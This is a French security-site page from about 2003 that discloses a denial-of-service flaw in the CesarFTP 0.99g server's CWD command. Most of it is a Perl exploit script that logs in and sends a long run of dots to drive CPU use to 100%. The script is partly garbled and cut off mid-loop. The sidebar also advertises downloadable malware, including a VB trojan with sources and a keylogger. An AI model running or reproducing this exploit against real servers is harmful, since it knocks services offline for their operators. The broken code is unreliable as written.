Welcome to Coding : Sécurité Programmation Réseaux

Search   in  

 Create an Account Home | Submit News Your Account Content | Topics | Top 10  


Accueil
· Home
· Listing des Articles
· Top 10
· Repository des Exploits

Les sujets / parties
· C / C ++
· Visual Basic
· Asm
· Reseaux
· Java
· Securite
· Divers

Utile
· Listing des Articles
· Telecharger
· Le Forum
· Liens
· Proposer un article

Top20 des Downloads
· 1: Etude des reseaux generalites et protocoles
· 2: Cheval de troie en VB avec sources
· 3: Netcat 1.1
· 4: Keylogger
· 5: Etudes des reseaux hauts debits architectures et protocoles
· 6: Ecoute de port
· 7: Etude du Smart Spoofing
· 8: Win Packet Capture Utils
· 9: Tutorial on Traffic Interception on Switched Lan using ARP spoofing
· 10: Cours de C

User Info
Welcome, Anonymous
Nickname
Password
(Register)
Membership:
Latest: trapcodien
New Today: 1
New Yesterday: 0
Overall: 2207
People Online:
Visitors: 40
Members: 1
Total: 41
Online Now:
01: trapcodien

  
Faille de securite dans CesarFTP 0.99g
Posted on Monday, December 22 @ 02:33:10 CET
Topic: Securité
Securité 

	Le serveur CesarFTPv0.99g (http://www.aclogic.com/) presente une faille de securite dans la commande CWD. Cette derniere affecte les ressources CPU lorsque l'on lui envoi la sequence :



CWD ..................Longue sequence de points(10000 par exemple)....



L'utilisation du CPU avoisine les 100%, et la connexion ne repond plus.

Tester sur Windows XP. Les versions anterieurs a la 0.99g sont probablement aussi vulnerable.

A la suite : Fichier perl permettant de tester cette faille

--------cesar0.99g_dos.pl---------------------------------------------------

#!/usr/bin/perl -w
use IO::Socket;

########################################
#            _   _
#      ____ (_) | |__
#     |_  / | | | '_ 
#      / /  | | | |_) |
#     /___| |_| |_.__/
#
#   http://coding.romainl.com/
#
########################################
## 
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user   : zib
## pass   : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user   : zib
##pass   : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################

if (@ARGV   
";
print "
";
print "  - host for attack
";
print "  - a valid ftp user account, could be anonymous
";
print "  - pass for the login
";
print "#############################################################";
exit();
}

$server = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$nb   = 10000;

print "
";
print "server : $server
";
print "user   : $user
";
print "pass   : $pass
";
print "
";
$i = 0;
print "[~] prepare to connect...
";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort 

=> "21") || 
die "[-] connect failed
";
print "[+] connected
";
print "[~] prepare to send data...
";
print $socket "USER $user
";
print $socket "PASS $pass
";
print "[+] success
";
print "[~] Send CPU Overload Sequence...
";
print $socket "CWD ";
for($i=0;$i

 
Liens connexes
· Plus à propos de Securité
· Nouvelles transmises par Romain_Le_Guen
L'article le plus lu à propos de Securité:
Tutoriel Aircrack


Article Rating
Average Score: 0
Votes: 0

Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad


Options

 Format imprimable Format imprimable



Re: Faille de securite dans CesarFTP 0.99g (Score: 1)
by zib on Tuesday, December 23 @ 01:19:00 CET
(Profil Utilisateur | Envoyer un message)
Voir aussi sur :
http://www.securityfocus.com/archive/1/348239/2003-12-20/2003-12-26/0


PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Page Generation: 0.39 Seconds